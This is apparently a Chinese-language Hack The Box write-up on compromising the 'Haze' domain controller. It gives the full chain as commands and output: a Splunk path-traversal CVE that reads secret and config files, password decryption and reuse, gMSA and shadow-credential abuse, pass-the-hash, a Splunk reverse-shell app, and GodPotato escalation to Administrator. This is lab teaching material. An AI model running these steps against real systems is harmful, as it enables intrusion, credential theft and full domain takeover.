Before all Attacker’s IP: 10.10.16.5痛苦面具 on,太久沒打 AD 手差不多要生鏽了
RECON port scan Command:
1 rustscan -a 10.10.11.61 --ulimit 5000 -- -sC -sV -Pn
Result:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 Open 10.10.11.61:53 Open 10.10.11.61:88 Open 10.10.11.61:135 Open 10.10.11.61:139 Open 10.10.11.61:389 Open 10.10.11.61:445 Open 10.10.11.61:464 Open 10.10.11.61:593 Open 10.10.11.61:636 Open 10.10.11.61:3268 Open 10.10.11.61:3269 Open 10.10.11.61:5985 Open 10.10.11.61:8000 Open 10.10.11.61:8089 Open 10.10.11.61:8088 Open 10.10.11.61:9389 Open 10.10.11.61:47001 Open 10.10.11.61:49664 Open 10.10.11.61:49666 Open 10.10.11.61:49665 Open 10.10.11.61:49667 Open 10.10.11.61:49669 Open 10.10.11.61:55112 Open 10.10.11.61:55113 Open 10.10.11.61:55130 Open 10.10.11.61:55124 Open 10.10.11.61:55129 Open 10.10.11.61:55146 Open 10.10.11.61:55156 Open 10.10.11.61:62536
port 8080, 8088, 8089 都是 Splunk 相關的服務,另外這就是一台很一般的 Domain Controller
Exploit CVE-2024-36991 查了一下,試了一下發現了這個 LFI 的 CVE:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 ┌──(kali🐳kali)-[~/ctf/hackthebox] └─$ curl '10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../var/lib/splunk/kvstore/mongo/splunk.key' 2awDpwadMi9aNpty4EGAOXBmGQWZc2b70SsaEpznjdoaFEXizvv1mca1p9v1d6KXtOLayvcHqA2igXIYYoE7pgaa ┌──(kali🐳kali)-[~/ctf/hackthebox] └─$ curl '10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/system/local/authentication.conf' [splunk_auth] minPasswordLength = 8 minPasswordUppercase = 0 minPasswordLowercase = 0 minPasswordSpecial = 0 minPasswordDigit = 0 [Haze LDAP Auth] SSLEnabled = 0 anonymous_referrals = 1 bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN +qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY= charset = utf8 emailAttribute = mail enableRangeRetrieval = 0 groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb groupMappingAttribute = dn groupMemberAttribute = member groupNameAttribute = cn host = dc01.haze.htb nestedGroups = 0 network_timeout = 20 pagelimit = -1 port = 389 realNameAttribute = cn sizelimit = 1000 timelimit = 15 userBaseDN = CN=Users,DC=haze,DC=htb userNameAttribute = samaccountname [authentication] authSettings = Haze LDAP Auth authType = LDAP
有讀過 /etc/passwd,但 hash 炸不出來 :Dhttps://docs.splunk.com/Documentation/Splunk/9.4.1/Admin/Authenticationconf https://community.splunk.com/t5/Knowledge-Management/How-to-resolve-issues-with-mongod-startup-such-as-quot-Failed-to/m-p/244278 [Github]splunksecret dump 出來就行
1 2 3 4 ┌──(kali🐳kali)-[~/ctf/hackthebox] └─$ splunksecrets splunk-decrypt --splunk-secret splunk_secret Ciphertext: $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN +qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY= Ld@p_Auth_Sp1unk@2k24
成功拿到!
password spray 先用 enum4linux/bloodhound RECON
1 enum4linux -u 'Paul.Taylor' -p 'Ld@p_Auth_Sp1unk@2k24' -a 10.10.11.61
拿到另一個 username:mark.adams
同一組密碼成功登入 XD
1 evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i haze.htb
Get Shell
Privilege Escalation gMSA write to Haze-IT-Backup BloodHound 做資訊蒐集:
1 bloodhound-python -c All -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -ns 10.10.11.61 --zip
在 evil-winrm 開的 shell 上:Get-ADServiceAccount -Filter *Result:
1 2 3 4 5 6 7 8 DistinguishedName : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb Enabled : True Name : Haze-IT-Backup ObjectClass : msDS-GroupManagedServiceAccount ObjectGUID : 66f8d593-2f0b-4a56-95b4-01b326c7a780 SamAccountName : Haze-IT-Backup$ SID : S-1-5-21-323145914-28650650-2368316563-1111 UserPrincipalName :
ㄟ … Haze-IT-Backup 電腦帳號?
dacledit 看:
1 dacledit.py -target HAZE-IT-BACKUP$ -dc-ip 10.10.11.61 haze.htb/mark.adams:'Ld@p_Auth_Sp1unk@2k24'
中間有這樣一段:
1 2 3 4 5 6 7 [*] ACE[5] info [*] ACE Type : ACCESS_ALLOWED_OBJECT_ACE [*] ACE flags : None [*] Access mask : WriteProperty [*] Flags : ACE_OBJECT_TYPE_PRESENT [*] Object type (GUID) : ms-DS-GroupMSAMembership (888eedd6-ce04-df40-b462-b8a50e41ba38) [*] Trustee (SID) : gMSA_Managers (S-1-5-21-323145914-28650650-2368316563-1107)
我們對 ms-DS-GroupMSAMembership 有寫入權限:
在 powershell 上開,把自己加入 PrincipalsAllowedToRetrieveManagedPassword (本質上能讀取密碼就是因為這個 flag)
1 2 3 Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams" $user = Get-ADUser -Identity "mark.adams" Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword $user.DistinguishedName
最後再用 gMSADumper.py 做讀取:
1 2 3 4 5 6 7 ┌──(kali🐳kali)-[~/ad-tool/gMSADumper] └─$ python3 gMSADumper.py -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb Users or groups who can read password for Haze-IT-Backup$: > mark.adams Haze-IT-Backup$:::a70df6599d5eab1502b38f9c1c3fd828 Haze-IT-Backup$:aes256-cts-hmac-sha1-96:a455156dcce482f3ac359929b41d2f5ead1d72dd764b7f5d9f27a8c2a44a67a6 Haze-IT-Backup$:aes128-cts-hmac-sha1-96:d99b9f57ffe1a4ab867a018a99a7edab
再上一次 BloodHound:
1 bloodhound-python -c All -u 'Haze-IT-Backup$' --hashes ':a70df6599d5eab1502b38f9c1c3fd828' -d haze.htb -ns 10.10.11.61 --zip
這次終於拿到一堆正常的東西惹 … 登入成功
關注這條 writeowner 和 forcechangepassword
Group Abuse shadow credential to edward.martin 順序是:
1 2 3 4 5 6 7 8 9 impacket-owneredit -action write -new-owner 'Haze-IT-Backup$' -target 'SUPPORT_SERVICES' 'HAZE.HTB' /'Haze-IT-Backup$' -hashes ':a70df6599d5eab1502b38f9c1c3fd828' bloodyAD --host "10.10.11.61" -d haze.htb -u 'Haze-IT-Backup$' -p ':a70df6599d5eab1502b38f9c1c3fd828' add genericAll 'SUPPORT_SERVICES' 'Haze-IT-Backup$' bloodyAD --host "10.10.11.61" -d haze.htb -u 'Haze-IT-Backup$' -p ':a70df6599d5eab1502b38f9c1c3fd828' add groupMember 'SUPPORT_SERVICES' 'Haze-IT-Backup$' pywhisker -d haze.htb -u 'Haze-IT-Backup$' -H ':a70df6599d5eab1502b38f9c1c3fd828' --target edward.martin --action "add"
接下來沒意外就能拿到 pfx 和 密碼獲得 TGT 了,使用 PKINITtools
1 2 3 python3 -m venv venv source venv/bin/activatepip install -r requirements.txt
去拿 TGT
1 2 3 4 python3 gettgtpkinit.py 'haze.htb/edward.martin' \ -cert-pfx /home/kali/ctf/hackthebox/1AULb1Gx.pfx \ -pfx-pass jWzFFlzva5M4VjTrxqFC \ edward.martin.ccache
TGT 變現為 NTLM HASH
1 python3 getnthash.py 'haze.htb/edward.martin' -key c51c1189bbc0729ba582be3357eac573aa341bd38d70de0f02630014f40a9be5
最後 pass the hash
1 evil-winrm -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af' -i 10.10.11.61
User GET!
再檢查一次自己的用戶組,發現有 backup 讀取權限…
1 *Evil-WinRM * PS C:\Backups\Splunk> download splunk_backup_2024-08-06 .zip
把備份 dump 下來,grep 密碼
1 2 cd Splunkgrep -r '\$[0-9]\$'
1 2 3 4 ┌──(kali🐳kali)-[~/ctf/hackthebox] └─$ splunksecrets splunk-legacy-decrypt -S Splunk/etc/auth/splunk.secret Ciphertext: $1$YDz8WfhoCWmf6aTRkA +QqUI= Sp1unkadmin@2k24
拿到密碼 XD
splunk upload shell to SeImpersonatePrivilege 拿到 Splunk Admin 密碼,登入後照著 https://github.com/TBGSecurity/splunk_shells 操作,把自製的 splunk_shells_TA_win 看要不要改一下inputs.json 注入的 shell 再上傳成一個新的服務,原則上會 get reverse shell
下 whoami 確認權限,發現 SeImpersonatePrivilege,可能可以透過 Potato 家族腳本提權
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 C:\Temp >whoami /all whoami /all USER INFORMATION ---------------- User Name SID ==================== =========================================== haze \alexander.green S -1-5-21-323145914-28650650-2368316563-1106GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ =========================================== ================================================== Everyone Well -known group S -1-1-0 Mandatory group , Enabled by default , Enabled group BUILTIN \Users Alias S -1-5-32-545 Mandatory group , Enabled by default , Enabled group BUILTIN \Pre -Windows 2000 Compatible Access Alias S -1-5-32-554 Mandatory group , Enabled by default , Enabled group BUILTIN \Certificate Service DCOM Access Alias S -1-5-32-574 Mandatory group , Enabled by default , Enabled group NT AUTHORITY \SERVICE Well -known group S -1-5-6 Mandatory group , Enabled by default , Enabled group CONSOLE LOGON Well -known group S -1-2-1 Mandatory group , Enabled by default , Enabled group NT AUTHORITY \Authenticated Users Well -known group S -1-5-11 Mandatory group , Enabled by default , Enabled group NT AUTHORITY \This Organization Well -known group S -1-5-15 Mandatory group , Enabled by default , Enabled group LOCAL Well -known group S -1-2-0 Mandatory group , Enabled by default , Enabled group HAZE \Splunk_Admins Group S -1-5-21-323145914-28650650-2368316563-1108 Mandatory group , Enabled by default , Enabled group Authentication authority asserted identity Well -known group S -1-18-1 Mandatory group , Enabled by default , Enabled group Mandatory Label \High Mandatory Level Label S -1-16-12288 PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeMachineAccountPrivilege Add workstations to domain Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled USER CLAIMS INFORMATION ----------------------- User claims unknown .Kerberos support for Dynamic Access Control on this device has been disabled .
1 2 3 4 5 6 7 C:\Temp>systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Hotfix(s)" systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Hotfix(s)" Host Name: DC01 OS Name: Microsoft Windows Server 2022 Standard OS Version: 10.0.20348 N/A Build 20348 System Type: x64-based PC Hotfix(s): N/A
版本為 Windows Server 2022,判斷可以使用 GodPotato 提權
1 .\exp.exe -cmd "cmd .exe /c net user Administrator Whale120"
最後利用 evil-winrm 登入:
1 evil-winrm -u 'Administrator' -H '06dc954d32cb91ac2831d67e3e12027f' -i 10.10.11.61
